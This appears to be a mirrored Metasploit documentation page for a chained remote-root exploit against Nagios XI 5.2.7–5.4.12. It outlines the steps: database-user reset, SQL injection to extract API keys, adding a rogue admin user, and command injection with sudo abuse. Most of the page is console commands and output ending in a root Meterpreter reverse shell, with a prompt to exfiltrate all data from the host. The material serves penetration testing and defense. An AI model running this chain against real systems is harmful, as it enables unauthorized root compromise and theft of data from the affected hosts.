adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
7dbdb42154dfb78905554bc19f398dd21de852df
metasploit-gs/documentation/modules/exploit/linux/http/nagios_xi.md
T

2.6 KiB
Raw Blame History

Vulnerable Application

Nagios XI 5.2.7 - 5.4.12 Chained Remote Root RCE

This exploit combines many different vulnerabilities in Nagios XI to

gain remote root access to the affected host. The process is:

  1. Reset the database user to root.
  2. Exploit SQL injection to extract api keys.
  3. Use api key to add administrative user.
  4. Authenticate to application using newly added user.
  5. Exploit command injection and sudo misconfiguration to get remote root shell.
  6. Remove added admin user, and reset database user.

See our blog post for more information

Verification Steps

  1. use exploit/linux/http/nagios
  2. set lhost [IP]
  3. set rhost [IP]
  4. exploit
  5. A meterpreter session should have been opened successfully

Scenarios

Nagios 5.2.7 on CentOS 6.7

msf > use exploit/linux/http/nagios_xi

msf exploit(nagios_xi) > set LHOST 15.0.0.181
LHOST => 15.0.0.181
msf exploit(nagios_xi) > set RHOST 10.20.1.194
RHOST => 10.20.1.194
msf exploit(nagios_xi) > exploit

[*] Started reverse TCP handler on 15.0.0.181:4444 
[*] STEP 0: Get Nagios XI version string.
[+] STEP 0: Found Nagios XI version: 5.3.0
[*] STEP 1: Setting Nagios XI DB user to root.
[*] STEP 1: Received a 302 Response. That's good!
[*] STEP 2: Exploiting SQLi to extract user API keys.
[*] STEP 2: Received a 302 Response. That's good!
[*] Found 1 unique api keys
[*] 67e52c8b387b0d17cb94b66788adaa40
[*] STEP 3: Using API Keys to add an administrative user...
[*] STEP 3: trying to add admin user with key 67e52c8b387b0d17cb94b66788adaa40
[+] Added user:aYJupLthTjZnwSQb password:heuOsZJMjwUYFpit userid:3
[*] STEP 4.1: Authenticate as user aYJupLthTjZnwSQb with password heuOsZJMjwUYFpit
[*] STEP 4.1: Get NSP and nagiosxi for login..
[*] STEP 4.1: login_nsp 1c52b832891f65d961e69d0db9a583f88c1dddcf637d37405c88d70a5371fe77 
[*] STEP 4.1: login_nagiosxi 5kk73vr4i3g6v1d5ekg2mtgd26
[*] STEP 4.2: Authenticating...
[*] STEP 4.2: authed_nagiosxi 5kk73vr4i3g6v1d5ekg2mtgd26
[*] STEP 5.1: executing payload
[*] STEP 5.2: removing scripts from disc
[*] Command Stager progress - 100.00% done (701/701 bytes)
[*] STEP 6.1: Setting Nagios XI DB user to nagiosql.
[*] STEP 6.1: Received a 302 Response. That's good!
[*] STEP 6.2: deleting admin
[*] Sending stage (847604 bytes) to 10.20.1.194
[*] Meterpreter session 1 opened (15.0.0.181:4444 -> 10.20.1.194:35750) at 2018-04-26 17:36:22 -0400
[*] Be sure to run post/linux/gather/enum_nagios_xi to exfil all the data off this box!

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
Reference in New Issue View Git Blame Copy Permalink